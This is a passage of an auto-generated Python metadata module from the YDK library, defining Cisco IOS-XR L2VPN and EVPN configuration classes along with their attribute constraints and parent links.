'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnbgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnbgpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnbgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Interface-specific timers
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-peering', ATTRIBUTE, 'int' , None, None,
[('0', '300')], [],
''' Interface-specific Peering timer
''',
'evpnac_peering',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-recovery', ATTRIBUTE, 'int' , None, None,
[('20', '3600')], [],
''' Interface-specific Recovery timer
''',
'evpnac_recovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpnac-timers',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
False,
[
_MetaInfoClassMember('bytes1', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 1st Byte
''',
'bytes1',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes23', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 2nd and 3rd Bytes
''',
'bytes23',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes45', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 4th and 5th Bytes
''',
'bytes45',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes67', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 6th and 7th Bytes
''',
'bytes67',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bytes89', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{1,8}'],
''' Type 0's 8th and 9th Bytes
''',
'bytes89',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'identifier-type0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
False,
[
_MetaInfoClassMember('primary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Primary services list
''',
'primary',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary', ATTRIBUTE, 'str' , None, None,
[(0, 150)], [],
''' Secondary services list
''',
'secondary',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'service-list',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Manual service carving
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('service-list', REFERENCE_CLASS, 'ServiceList' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
[], [],
''' Manual service carving primary,secondary
lists
''',
'service_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'manual-service-carving',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Ethernet Segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('es-import-route-target', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' ES-Import Route Target
''',
'es_import_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('force-single-homed', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force ethernet segment to remain
single-homed
''',
'force_single_homed',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('identifier-type0', REFERENCE_CLASS, 'IdentifierType0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
[], [],
''' Ethernet segment identifier (Type 0)
''',
'identifier_type0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balancing-per-service', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable per service load balancing mode
''',
'load_balancing_per_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('manual-service-carving', REFERENCE_CLASS, 'ManualServiceCarving' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
[], [],
''' Enter Manual service carving configuration
submode
''',
'manual_service_carving',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ethernet-segment',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ethernet-segment', REFERENCE_CLASS, 'EthernetSegment' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
[], [],
''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
_meta_table['L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info']
_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info'].parent =_meta_table['L2Vpn.PwRouting']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info']
